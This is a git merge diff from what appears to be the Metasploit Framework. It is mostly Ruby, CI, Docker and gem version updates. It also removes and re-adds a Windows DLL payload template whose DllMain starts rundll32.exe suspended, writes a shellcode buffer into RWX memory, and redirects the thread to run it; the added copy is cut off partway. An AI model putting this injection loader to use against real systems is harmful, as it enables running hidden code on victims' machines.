Merge remote-tracking branch 'upstream/master'
commit
c3c8ec761d
|
@ -1 +1 @@
|
||||||
2.4.1
|
2.4.2
|
||||||
|
|
17
.travis.yml
17
.travis.yml
|
@ -12,8 +12,8 @@ addons:
|
||||||
language: ruby
|
language: ruby
|
||||||
rvm:
|
rvm:
|
||||||
- '2.2'
|
- '2.2'
|
||||||
- '2.3.4'
|
- '2.3.5'
|
||||||
- '2.4.1'
|
- '2.4.2'
|
||||||
|
|
||||||
env:
|
env:
|
||||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
|
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
|
||||||
|
@ -21,9 +21,15 @@ env:
|
||||||
|
|
||||||
matrix:
|
matrix:
|
||||||
fast_finish: true
|
fast_finish: true
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
# build docker image
|
||||||
include:
|
include:
|
||||||
- rvm: ruby-head
|
- env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true"
|
||||||
env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build"
|
# we do not need any setup
|
||||||
|
before_install: skip
|
||||||
|
install: skip
|
||||||
|
before_script: skip
|
||||||
before_install:
|
before_install:
|
||||||
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
|
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
|
||||||
- rake --version
|
- rake --version
|
||||||
|
@ -42,7 +48,8 @@ before_script:
|
||||||
- git diff --exit-code db/schema.rb
|
- git diff --exit-code db/schema.rb
|
||||||
script:
|
script:
|
||||||
- echo "${CMD}"
|
- echo "${CMD}"
|
||||||
- bash -c "${CMD}"
|
# we need travis_wait because the Docker build job can take longer than 10 minutes
|
||||||
|
- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
|
||||||
|
|
||||||
notifications:
|
notifications:
|
||||||
irc: "irc.freenode.org#msfnotify"
|
irc: "irc.freenode.org#msfnotify"
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
FROM ruby:2.4.1-alpine
|
FROM ruby:2.4.2-alpine
|
||||||
MAINTAINER Rapid7
|
MAINTAINER Rapid7
|
||||||
|
|
||||||
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
|
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
|
||||||
|
@ -36,7 +36,8 @@ RUN apk update && \
|
||||||
ncurses-dev \
|
ncurses-dev \
|
||||||
git \
|
git \
|
||||||
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
|
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
|
||||||
&& gem update --system \
|
# this currently fails: https://github.com/rubygems/rubygems/issues/2064
|
||||||
|
# && gem update --system \
|
||||||
&& gem install bundler \
|
&& gem install bundler \
|
||||||
&& bundle install --system $BUNDLER_ARGS \
|
&& bundle install --system $BUNDLER_ARGS \
|
||||||
&& apk del .ruby-builddeps \
|
&& apk del .ruby-builddeps \
|
||||||
|
|
6
Gemfile
6
Gemfile
|
@ -19,8 +19,10 @@ group :development do
|
||||||
# module documentation
|
# module documentation
|
||||||
gem 'octokit'
|
gem 'octokit'
|
||||||
# Metasploit::Aggregator external session proxy
|
# Metasploit::Aggregator external session proxy
|
||||||
# Disabled for now for crypttlv updates
|
gem 'metasploit-aggregator' if [
|
||||||
# gem 'metasploit-aggregator'
|
'x86-mingw32', 'x64-mingw32',
|
||||||
|
'x86_64-linux', 'x86-linux',
|
||||||
|
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
|
||||||
end
|
end
|
||||||
|
|
||||||
group :development, :test do
|
group :development, :test do
|
||||||
|
|
160
Gemfile.lock
160
Gemfile.lock
|
@ -1,7 +1,7 @@
|
||||||
PATH
|
PATH
|
||||||
remote: .
|
remote: .
|
||||||
specs:
|
specs:
|
||||||
metasploit-framework (4.16.8)
|
metasploit-framework (4.16.18)
|
||||||
actionpack (~> 4.2.6)
|
actionpack (~> 4.2.6)
|
||||||
activerecord (~> 4.2.6)
|
activerecord (~> 4.2.6)
|
||||||
activesupport (~> 4.2.6)
|
activesupport (~> 4.2.6)
|
||||||
|
@ -17,9 +17,9 @@ PATH
|
||||||
metasploit-concern
|
metasploit-concern
|
||||||
metasploit-credential
|
metasploit-credential
|
||||||
metasploit-model
|
metasploit-model
|
||||||
metasploit-payloads (= 1.3.8)
|
metasploit-payloads (= 1.3.14)
|
||||||
metasploit_data_models
|
metasploit_data_models
|
||||||
metasploit_payloads-mettle (= 0.2.2)
|
metasploit_payloads-mettle (= 0.2.5)
|
||||||
msgpack
|
msgpack
|
||||||
nessus_rest
|
nessus_rest
|
||||||
net-ssh
|
net-ssh
|
||||||
|
@ -49,7 +49,7 @@ PATH
|
||||||
rex-mime
|
rex-mime
|
||||||
rex-nop
|
rex-nop
|
||||||
rex-ole
|
rex-ole
|
||||||
rex-powershell (< 0.1.73)
|
rex-powershell (< 0.1.78)
|
||||||
rex-random_identifier
|
rex-random_identifier
|
||||||
rex-registry
|
rex-registry
|
||||||
rex-rop_builder
|
rex-rop_builder
|
||||||
|
@ -73,27 +73,27 @@ GEM
|
||||||
remote: https://rubygems.org/
|
remote: https://rubygems.org/
|
||||||
specs:
|
specs:
|
||||||
Ascii85 (1.0.2)
|
Ascii85 (1.0.2)
|
||||||
actionpack (4.2.9)
|
actionpack (4.2.10)
|
||||||
actionview (= 4.2.9)
|
actionview (= 4.2.10)
|
||||||
activesupport (= 4.2.9)
|
activesupport (= 4.2.10)
|
||||||
rack (~> 1.6)
|
rack (~> 1.6)
|
||||||
rack-test (~> 0.6.2)
|
rack-test (~> 0.6.2)
|
||||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||||
rails-html-sanitizer (~> 1.0, >= 1.0.2)
|
rails-html-sanitizer (~> 1.0, >= 1.0.2)
|
||||||
actionview (4.2.9)
|
actionview (4.2.10)
|
||||||
activesupport (= 4.2.9)
|
activesupport (= 4.2.10)
|
||||||
builder (~> 3.1)
|
builder (~> 3.1)
|
||||||
erubis (~> 2.7.0)
|
erubis (~> 2.7.0)
|
||||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||||
rails-html-sanitizer (~> 1.0, >= 1.0.3)
|
rails-html-sanitizer (~> 1.0, >= 1.0.3)
|
||||||
activemodel (4.2.9)
|
activemodel (4.2.10)
|
||||||
activesupport (= 4.2.9)
|
activesupport (= 4.2.10)
|
||||||
builder (~> 3.1)
|
builder (~> 3.1)
|
||||||
activerecord (4.2.9)
|
activerecord (4.2.10)
|
||||||
activemodel (= 4.2.9)
|
activemodel (= 4.2.10)
|
||||||
activesupport (= 4.2.9)
|
activesupport (= 4.2.10)
|
||||||
arel (~> 6.0)
|
arel (~> 6.0)
|
||||||
activesupport (4.2.9)
|
activesupport (4.2.10)
|
||||||
i18n (~> 0.7)
|
i18n (~> 0.7)
|
||||||
minitest (~> 5.1)
|
minitest (~> 5.1)
|
||||||
thread_safe (~> 0.3, >= 0.3.4)
|
thread_safe (~> 0.3, >= 0.3.4)
|
||||||
|
@ -102,37 +102,65 @@ GEM
|
||||||
public_suffix (>= 2.0.2, < 4.0)
|
public_suffix (>= 2.0.2, < 4.0)
|
||||||
afm (0.2.2)
|
afm (0.2.2)
|
||||||
arel (6.0.4)
|
arel (6.0.4)
|
||||||
arel-helpers (2.4.0)
|
arel-helpers (2.5.0)
|
||||||
activerecord (>= 3.1.0, < 6)
|
activerecord (>= 3.1.0, < 6)
|
||||||
backports (3.8.0)
|
backports (3.10.3)
|
||||||
bcrypt (3.1.11)
|
bcrypt (3.1.11)
|
||||||
bcrypt_pbkdf (1.0.0)
|
bcrypt_pbkdf (1.0.0)
|
||||||
bindata (2.4.1)
|
bindata (2.4.1)
|
||||||
bit-struct (0.16)
|
bit-struct (0.16)
|
||||||
builder (3.2.3)
|
builder (3.2.3)
|
||||||
coderay (1.1.2)
|
coderay (1.1.2)
|
||||||
|
concurrent-ruby (1.0.5)
|
||||||
|
crass (1.0.3)
|
||||||
diff-lcs (1.3)
|
diff-lcs (1.3)
|
||||||
dnsruby (1.60.2)
|
dnsruby (1.60.2)
|
||||||
docile (1.1.5)
|
docile (1.1.5)
|
||||||
erubis (2.7.0)
|
erubis (2.7.0)
|
||||||
factory_girl (4.8.0)
|
factory_girl (4.9.0)
|
||||||
activesupport (>= 3.0.0)
|
activesupport (>= 3.0.0)
|
||||||
factory_girl_rails (4.8.0)
|
factory_girl_rails (4.9.0)
|
||||||
factory_girl (~> 4.8.0)
|
factory_girl (~> 4.9.0)
|
||||||
railties (>= 3.0.0)
|
railties (>= 3.0.0)
|
||||||
faraday (0.13.1)
|
faraday (0.13.1)
|
||||||
multipart-post (>= 1.2, < 3)
|
multipart-post (>= 1.2, < 3)
|
||||||
ffi (1.9.18)
|
ffi (1.9.18)
|
||||||
filesize (0.1.1)
|
filesize (0.1.1)
|
||||||
fivemat (1.3.5)
|
fivemat (1.3.5)
|
||||||
|
google-protobuf (3.5.0)
|
||||||
|
googleapis-common-protos-types (1.0.1)
|
||||||
|
google-protobuf (~> 3.0)
|
||||||
|
googleauth (0.6.2)
|
||||||
|
faraday (~> 0.12)
|
||||||
|
jwt (>= 1.4, < 3.0)
|
||||||
|
logging (~> 2.0)
|
||||||
|
memoist (~> 0.12)
|
||||||
|
multi_json (~> 1.11)
|
||||||
|
os (~> 0.9)
|
||||||
|
signet (~> 0.7)
|
||||||
|
grpc (1.7.2)
|
||||||
|
google-protobuf (~> 3.1)
|
||||||
|
googleapis-common-protos-types (~> 1.0.0)
|
||||||
|
googleauth (>= 0.5.1, < 0.7)
|
||||||
hashery (2.1.2)
|
hashery (2.1.2)
|
||||||
i18n (0.8.6)
|
i18n (0.9.1)
|
||||||
|
concurrent-ruby (~> 1.0)
|
||||||
jsobfu (0.4.2)
|
jsobfu (0.4.2)
|
||||||
rkelly-remix
|
rkelly-remix
|
||||||
json (2.1.0)
|
json (2.1.0)
|
||||||
loofah (2.0.3)
|
jwt (2.1.0)
|
||||||
|
little-plugger (1.1.4)
|
||||||
|
logging (2.2.2)
|
||||||
|
little-plugger (~> 1.1)
|
||||||
|
multi_json (~> 1.10)
|
||||||
|
loofah (2.1.1)
|
||||||
|
crass (~> 1.0.2)
|
||||||
nokogiri (>= 1.5.9)
|
nokogiri (>= 1.5.9)
|
||||||
|
memoist (0.16.0)
|
||||||
metasm (1.0.3)
|
metasm (1.0.3)
|
||||||
|
metasploit-aggregator (1.0.0)
|
||||||
|
grpc
|
||||||
|
rex-arch
|
||||||
metasploit-concern (2.0.5)
|
metasploit-concern (2.0.5)
|
||||||
activemodel (~> 4.2.6)
|
activemodel (~> 4.2.6)
|
||||||
activesupport (~> 4.2.6)
|
activesupport (~> 4.2.6)
|
||||||
|
@ -150,7 +178,7 @@ GEM
|
||||||
activemodel (~> 4.2.6)
|
activemodel (~> 4.2.6)
|
||||||
activesupport (~> 4.2.6)
|
activesupport (~> 4.2.6)
|
||||||
railties (~> 4.2.6)
|
railties (~> 4.2.6)
|
||||||
metasploit-payloads (1.3.8)
|
metasploit-payloads (1.3.14)
|
||||||
metasploit_data_models (2.0.15)
|
metasploit_data_models (2.0.15)
|
||||||
activerecord (~> 4.2.6)
|
activerecord (~> 4.2.6)
|
||||||
activesupport (~> 4.2.6)
|
activesupport (~> 4.2.6)
|
||||||
|
@ -161,22 +189,24 @@ GEM
|
||||||
postgres_ext
|
postgres_ext
|
||||||
railties (~> 4.2.6)
|
railties (~> 4.2.6)
|
||||||
recog (~> 2.0)
|
recog (~> 2.0)
|
||||||
metasploit_payloads-mettle (0.2.2)
|
metasploit_payloads-mettle (0.2.5)
|
||||||
method_source (0.8.2)
|
method_source (0.9.0)
|
||||||
mini_portile2 (2.2.0)
|
mini_portile2 (2.3.0)
|
||||||
minitest (5.10.3)
|
minitest (5.10.3)
|
||||||
msgpack (1.1.0)
|
msgpack (1.1.0)
|
||||||
|
multi_json (1.12.2)
|
||||||
multipart-post (2.0.0)
|
multipart-post (2.0.0)
|
||||||
nessus_rest (0.1.6)
|
nessus_rest (0.1.6)
|
||||||
net-ssh (4.2.0)
|
net-ssh (4.2.0)
|
||||||
network_interface (0.0.2)
|
network_interface (0.0.2)
|
||||||
nexpose (7.0.1)
|
nexpose (7.1.1)
|
||||||
nokogiri (1.8.0)
|
nokogiri (1.8.1)
|
||||||
mini_portile2 (~> 2.2.0)
|
mini_portile2 (~> 2.3.0)
|
||||||
octokit (4.7.0)
|
octokit (4.7.0)
|
||||||
sawyer (~> 0.8.0, >= 0.5.3)
|
sawyer (~> 0.8.0, >= 0.5.3)
|
||||||
openssl-ccm (1.2.1)
|
openssl-ccm (1.2.1)
|
||||||
openvas-omp (0.0.4)
|
openvas-omp (0.0.4)
|
||||||
|
os (0.9.6)
|
||||||
packetfu (1.1.13)
|
packetfu (1.1.13)
|
||||||
pcaprub
|
pcaprub
|
||||||
patch_finder (1.0.2)
|
patch_finder (1.0.2)
|
||||||
|
@ -193,11 +223,10 @@ GEM
|
||||||
activerecord (>= 4.0.0)
|
activerecord (>= 4.0.0)
|
||||||
arel (>= 4.0.1)
|
arel (>= 4.0.1)
|
||||||
pg_array_parser (~> 0.0.9)
|
pg_array_parser (~> 0.0.9)
|
||||||
pry (0.10.4)
|
pry (0.11.3)
|
||||||
coderay (~> 1.1.0)
|
coderay (~> 1.1.0)
|
||||||
method_source (~> 0.8.1)
|
method_source (~> 0.9.0)
|
||||||
slop (~> 3.4)
|
public_suffix (3.0.1)
|
||||||
public_suffix (3.0.0)
|
|
||||||
rack (1.6.8)
|
rack (1.6.8)
|
||||||
rack-test (0.6.3)
|
rack-test (0.6.3)
|
||||||
rack (>= 1.0)
|
rack (>= 1.0)
|
||||||
|
@ -209,21 +238,21 @@ GEM
|
||||||
rails-deprecated_sanitizer (>= 1.0.1)
|
rails-deprecated_sanitizer (>= 1.0.1)
|
||||||
rails-html-sanitizer (1.0.3)
|
rails-html-sanitizer (1.0.3)
|
||||||
loofah (~> 2.0)
|
loofah (~> 2.0)
|
||||||
railties (4.2.9)
|
railties (4.2.10)
|
||||||
actionpack (= 4.2.9)
|
actionpack (= 4.2.10)
|
||||||
activesupport (= 4.2.9)
|
activesupport (= 4.2.10)
|
||||||
rake (>= 0.8.7)
|
rake (>= 0.8.7)
|
||||||
thor (>= 0.18.1, < 2.0)
|
thor (>= 0.18.1, < 2.0)
|
||||||
rake (12.1.0)
|
rake (12.3.0)
|
||||||
rb-readline (0.5.5)
|
rb-readline (0.5.5)
|
||||||
rbnacl (4.0.2)
|
rbnacl (4.0.2)
|
||||||
ffi
|
ffi
|
||||||
rbnacl-libsodium (1.0.13)
|
rbnacl-libsodium (1.0.15.1)
|
||||||
rbnacl (>= 3.0.1)
|
rbnacl (>= 3.0.1)
|
||||||
recog (2.1.15)
|
recog (2.1.16)
|
||||||
nokogiri
|
nokogiri
|
||||||
redcarpet (3.4.0)
|
redcarpet (3.4.0)
|
||||||
rex-arch (0.1.11)
|
rex-arch (0.1.13)
|
||||||
rex-text
|
rex-text
|
||||||
rex-bin_tools (0.1.4)
|
rex-bin_tools (0.1.4)
|
||||||
metasm
|
metasm
|
||||||
|
@ -236,7 +265,7 @@ GEM
|
||||||
metasm
|
metasm
|
||||||
rex-arch
|
rex-arch
|
||||||
rex-text
|
rex-text
|
||||||
rex-exploitation (0.1.14)
|
rex-exploitation (0.1.15)
|
||||||
jsobfu
|
jsobfu
|
||||||
metasm
|
metasm
|
||||||
rex-arch
|
rex-arch
|
||||||
|
@ -249,7 +278,7 @@ GEM
|
||||||
rex-arch
|
rex-arch
|
||||||
rex-ole (0.1.6)
|
rex-ole (0.1.6)
|
||||||
rex-text
|
rex-text
|
||||||
rex-powershell (0.1.72)
|
rex-powershell (0.1.77)
|
||||||
rex-random_identifier
|
rex-random_identifier
|
||||||
rex-text
|
rex-text
|
||||||
rex-random_identifier (0.1.4)
|
rex-random_identifier (0.1.4)
|
||||||
|
@ -259,7 +288,7 @@ GEM
|
||||||
metasm
|
metasm
|
||||||
rex-core
|
rex-core
|
||||||
rex-text
|
rex-text
|
||||||
rex-socket (0.1.8)
|
rex-socket (0.1.9)
|
||||||
rex-core
|
rex-core
|
||||||
rex-sslscan (0.1.5)
|
rex-sslscan (0.1.5)
|
||||||
rex-core
|
rex-core
|
||||||
|
@ -270,29 +299,29 @@ GEM
|
||||||
rex-zip (0.1.3)
|
rex-zip (0.1.3)
|
||||||
rex-text
|
rex-text
|
||||||
rkelly-remix (0.0.7)
|
rkelly-remix (0.0.7)
|
||||||
rspec (3.6.0)
|
rspec (3.7.0)
|
||||||
rspec-core (~> 3.6.0)
|
rspec-core (~> 3.7.0)
|
||||||
rspec-expectations (~> 3.6.0)
|
rspec-expectations (~> 3.7.0)
|
||||||
rspec-mocks (~> 3.6.0)
|
rspec-mocks (~> 3.7.0)
|
||||||
rspec-core (3.6.0)
|
rspec-core (3.7.0)
|
||||||
rspec-support (~> 3.6.0)
|
rspec-support (~> 3.7.0)
|
||||||
rspec-expectations (3.6.0)
|
rspec-expectations (3.7.0)
|
||||||
diff-lcs (>= 1.2.0, < 2.0)
|
diff-lcs (>= 1.2.0, < 2.0)
|
||||||
rspec-support (~> 3.6.0)
|
rspec-support (~> 3.7.0)
|
||||||
rspec-mocks (3.6.0)
|
rspec-mocks (3.7.0)
|
||||||
diff-lcs (>= 1.2.0, < 2.0)
|
diff-lcs (>= 1.2.0, < 2.0)
|
||||||
rspec-support (~> 3.6.0)
|
rspec-support (~> 3.7.0)
|
||||||
rspec-rails (3.6.1)
|
rspec-rails (3.7.1)
|
||||||
actionpack (>= 3.0)
|
actionpack (>= 3.0)
|
||||||
activesupport (>= 3.0)
|
activesupport (>= 3.0)
|
||||||
railties (>= 3.0)
|
railties (>= 3.0)
|
||||||
rspec-core (~> 3.6.0)
|
rspec-core (~> 3.7.0)
|
||||||
rspec-expectations (~> 3.6.0)
|
rspec-expectations (~> 3.7.0)
|
||||||
rspec-mocks (~> 3.6.0)
|
rspec-mocks (~> 3.7.0)
|
||||||
rspec-support (~> 3.6.0)
|
rspec-support (~> 3.7.0)
|
||||||
rspec-rerun (1.1.0)
|
rspec-rerun (1.1.0)
|
||||||
rspec (~> 3.0)
|
rspec (~> 3.0)
|
||||||
rspec-support (3.6.0)
|
rspec-support (3.7.0)
|
||||||
ruby-rc4 (0.1.5)
|
ruby-rc4 (0.1.5)
|
||||||
ruby_smb (0.0.18)
|
ruby_smb (0.0.18)
|
||||||
bindata
|
bindata
|
||||||
|
@ -303,21 +332,25 @@ GEM
|
||||||
sawyer (0.8.1)
|
sawyer (0.8.1)
|
||||||
addressable (>= 2.3.5, < 2.6)
|
addressable (>= 2.3.5, < 2.6)
|
||||||
faraday (~> 0.8, < 1.0)
|
faraday (~> 0.8, < 1.0)
|
||||||
|
signet (0.8.1)
|
||||||
|
addressable (~> 2.3)
|
||||||
|
faraday (~> 0.9)
|
||||||
|
jwt (>= 1.5, < 3.0)
|
||||||
|
multi_json (~> 1.10)
|
||||||
simplecov (0.15.1)
|
simplecov (0.15.1)
|
||||||
docile (~> 1.1.0)
|
docile (~> 1.1.0)
|
||||||
json (>= 1.8, < 3)
|
json (>= 1.8, < 3)
|
||||||
simplecov-html (~> 0.10.0)
|
simplecov-html (~> 0.10.0)
|
||||||
simplecov-html (0.10.2)
|
simplecov-html (0.10.2)
|
||||||
slop (3.6.0)
|
|
||||||
sqlite3 (1.3.13)
|
sqlite3 (1.3.13)
|
||||||
sshkey (1.9.0)
|
sshkey (1.9.0)
|
||||||
thor (0.20.0)
|
thor (0.20.0)
|
||||||
thread_safe (0.3.6)
|
thread_safe (0.3.6)
|
||||||
timecop (0.9.1)
|
timecop (0.9.1)
|
||||||
ttfunk (1.5.1)
|
ttfunk (1.5.1)
|
||||||
tzinfo (1.2.3)
|
tzinfo (1.2.4)
|
||||||
thread_safe (~> 0.1)
|
thread_safe (~> 0.1)
|
||||||
tzinfo-data (1.2017.2)
|
tzinfo-data (1.2017.3)
|
||||||
tzinfo (>= 1.0.0)
|
tzinfo (>= 1.0.0)
|
||||||
windows_error (0.1.2)
|
windows_error (0.1.2)
|
||||||
xdr (2.0.0)
|
xdr (2.0.0)
|
||||||
|
@ -332,6 +365,7 @@ PLATFORMS
|
||||||
DEPENDENCIES
|
DEPENDENCIES
|
||||||
factory_girl_rails
|
factory_girl_rails
|
||||||
fivemat
|
fivemat
|
||||||
|
metasploit-aggregator
|
||||||
metasploit-framework!
|
metasploit-framework!
|
||||||
octokit
|
octokit
|
||||||
pry
|
pry
|
||||||
|
@ -344,4 +378,4 @@ DEPENDENCIES
|
||||||
yard
|
yard
|
||||||
|
|
||||||
BUNDLED WITH
|
BUNDLED WITH
|
||||||
1.15.4
|
1.16.0
|
||||||
|
|
|
@ -84,7 +84,7 @@ rex-arch, 0.1.9, "New BSD"
|
||||||
rex-bin_tools, 0.1.4, "New BSD"
|
rex-bin_tools, 0.1.4, "New BSD"
|
||||||
rex-core, 0.1.11, "New BSD"
|
rex-core, 0.1.11, "New BSD"
|
||||||
rex-encoder, 0.1.4, "New BSD"
|
rex-encoder, 0.1.4, "New BSD"
|
||||||
rex-exploitation, 0.1.14, "New BSD"
|
rex-exploitation, 0.1.15, "New BSD"
|
||||||
rex-java, 0.1.5, "New BSD"
|
rex-java, 0.1.5, "New BSD"
|
||||||
rex-mime, 0.1.5, "New BSD"
|
rex-mime, 0.1.5, "New BSD"
|
||||||
rex-nop, 0.1.1, "New BSD"
|
rex-nop, 0.1.1, "New BSD"
|
||||||
|
|
|
@ -1,16 +0,0 @@
|
||||||
#!/bin/sh
|
|
||||||
rm -f *.o *.dll
|
|
||||||
|
|
||||||
CCx86="i686-w64-mingw32"
|
|
||||||
CCx64="x86_64-w64-mingw32"
|
|
||||||
|
|
||||||
${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
|
|
||||||
${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
|
|
||||||
${CCx64}-strip -s temp.dll -o template_x64_windows.dll
|
|
||||||
rm -f temp.dll *.o
|
|
||||||
|
|
||||||
${CCx86}-gcc -c -Os template.c -Wall -shared
|
|
||||||
${CCx86}-dllwrap --def template.def *.o -o temp.dll
|
|
||||||
${CCx86}-strip -s temp.dll -o template_x86_windows.dll
|
|
||||||
rm -f temp.dll *.o
|
|
||||||
|
|
|
@ -1,95 +0,0 @@
|
||||||
// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll
|
|
||||||
// - removed ExitThread(0) to prevent an Explorer crash
|
|
||||||
// - added Mutex to prevent invoking payload multiple times (at least try)
|
|
||||||
#include <windows.h>
|
|
||||||
#include "template.h"
|
|
||||||
|
|
||||||
void inline_bzero(void *p, size_t l)
|
|
||||||
{
|
|
||||||
BYTE *q = (BYTE *)p;
|
|
||||||
size_t x = 0;
|
|
||||||
for (x = 0; x < l; x++)
|
|
||||||
*(q++) = 0x00;
|
|
||||||
}
|
|
||||||
|
|
||||||
void ExecutePayload(void);
|
|
||||||
|
|
||||||
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
|
|
||||||
{
|
|
||||||
switch (dwReason)
|
|
||||||
{
|
|
||||||
case DLL_PROCESS_ATTACH:
|
|
||||||
ExecutePayload();
|
|
||||||
break;
|
|
||||||
|
|
||||||
case DLL_PROCESS_DETACH:
|
|
||||||
break;
|
|
||||||
|
|
||||||
case DLL_THREAD_ATTACH:
|
|
||||||
break;
|
|
||||||
|
|
||||||
case DLL_THREAD_DETACH:
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
|
|
||||||
return TRUE;
|
|
||||||
}
|
|
||||||
|
|
||||||
void ExecutePayload(void)
|
|
||||||
{
|
|
||||||
PROCESS_INFORMATION pi;
|
|
||||||
STARTUPINFO si;
|
|
||||||
CONTEXT ctx;
|
|
||||||
LPVOID ep;
|
|
||||||
HANDLE hMutex;
|
|
||||||
SECURITY_ATTRIBUTES MutexAttributes;
|
|
||||||
|
|
||||||
inline_bzero(&MutexAttributes, sizeof(MutexAttributes));
|
|
||||||
MutexAttributes.nLength = sizeof(MutexAttributes);
|
|
||||||
MutexAttributes.bInheritHandle = TRUE; // inherit the handle
|
|
||||||
hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex");
|
|
||||||
if(hMutex == NULL)
|
|
||||||
{
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
if(GetLastError() == ERROR_ALREADY_EXISTS)
|
|
||||||
{
|
|
||||||
CloseHandle(hMutex);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
if(GetLastError() == ERROR_ACCESS_DENIED)
|
|
||||||
{
|
|
||||||
CloseHandle(hMutex);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
// Start up the payload in a new process
|
|
||||||
inline_bzero(&si, sizeof(si));
|
|
||||||
si.cb = sizeof(si);
|
|
||||||
|
|
||||||
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
|
|
||||||
if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
|
|
||||||
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
|
|
||||||
GetThreadContext(pi.hThread, &ctx);
|
|
||||||
|
|
||||||
ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
|
||||||
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
|
|
||||||
|
|
||||||
#ifdef _WIN64
|
|
||||||
ctx.Rip = (DWORD64)ep;
|
|
||||||
#else
|
|
||||||
ctx.Eip = (DWORD)ep;
|
|
||||||
#endif
|
|
||||||
|
|
||||||
SetThreadContext(pi.hThread, &ctx);
|
|
||||||
ResumeThread(pi.hThread);
|
|
||||||
|
|
||||||
CloseHandle(pi.hThread);
|
|
||||||
CloseHandle(pi.hProcess);
|
|
||||||
}
|
|
||||||
|
|
||||||
CloseHandle(hMutex);
|
|
||||||
}
|
|
||||||
|
|
|
@ -1,3 +0,0 @@
|
||||||
#define SCSIZE 2048
|
|
||||||
unsigned char code[SCSIZE] = "PAYLOAD:";
|
|
||||||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,24 @@
|
||||||
|
#
|
||||||
|
# XXX: NOTE: this will only compile the x86 version.
|
||||||
|
#
|
||||||
|
# To compile the x64 version, use:
|
||||||
|
# C:\> call "c:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\vcvarsall.bat" amd64
|
||||||
|
# C:\> cl.exe -LD /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain kernel32.lib
|
||||||
|
#
|
||||||
|
|
||||||
|
if [ -z "$PREFIX" ]; then
|
||||||
|
PREFIX=i686-w64-mingw32
|
||||||
|
fi
|
||||||
|
|
||||||
|
rm -f *.o *.dll
|
||||||
|
$PREFIX-gcc -c template.c
|
||||||
|
$PREFIX-windres -o rc.o template.rc
|
||||||
|
$PREFIX-gcc -mdll -o junk.tmp -Wl,--base-file,base.tmp template.o rc.o
|
||||||
|
rm -f junk.tmp
|
||||||
|
$PREFIX-dlltool --dllname template_x86_windows.dll --base-file base.tmp --output-exp temp.exp #--def template.def
|
||||||
|
rm -f base.tmp
|
||||||
|
$PREFIX-gcc -mdll -o template_x86_windows.dll template.o rc.o -Wl,temp.exp
|
||||||
|
rm -f temp.exp
|
||||||
|
|
||||||
|
$PREFIX-strip template_x86_windows.dll
|
||||||
|
rm -f *.o
|
|
@ -0,0 +1,97 @@
|
||||||
|
#include <windows.h>
|
||||||
|
#include "template.h"
|
||||||
|
|
||||||
|
/* hand-rolled bzero allows us to avoid including ms vc runtime */
|
||||||
|
void inline_bzero(void *p, size_t l)
|
||||||
|
{
|
||||||
|
|
||||||
|
BYTE *q = (BYTE *)p;
|
||||||
|
size_t x = 0;
|
||||||
|
for (x = 0; x < l; x++)
|
||||||
|
*(q++) = 0x00;
|
||||||
|
}
|
||||||
|
|
||||||
|
void ExecutePayload(void);
|
||||||
|
|
||||||
|
BOOL WINAPI
|
||||||
|
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
|
||||||
|
{
|
||||||
|
switch (dwReason)
|
||||||
|
{
|
||||||
|
case DLL_PROCESS_ATTACH:
|
||||||
|
ExecutePayload();
|
||||||
|
break;
|
||||||
|
|
||||||
|
case DLL_PROCESS_DETACH:
|
||||||
|
// Code to run when the DLL is freed
|
||||||
|
break;
|
||||||
|
|
||||||
|
case DLL_THREAD_ATTACH:
|
||||||
|
// Code to run when a thread is created during the DLL's lifetime
|
||||||
|
break;
|
||||||
|
|
||||||
|
case DLL_THREAD_DETACH:
|
||||||
|
// Code to run when a thread ends normally.
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
return TRUE;
|
||||||
|
}
|
||||||
|
|
||||||
|
void ExecutePayload(void) {
|
||||||
|
int error;
|
||||||
|
PROCESS_INFORMATION pi;
|
||||||
|
STARTUPINFO si;
|
||||||
|
CONTEXT ctx;
|
||||||
|
DWORD prot;
|
||||||
|
LPVOID ep;
|
||||||
|
|
||||||
|
// Start up the payload in a new process
|
||||||
|
inline_bzero( &si, sizeof( si ));
|
||||||
|
si.cb = sizeof(si);
|
||||||
|
|
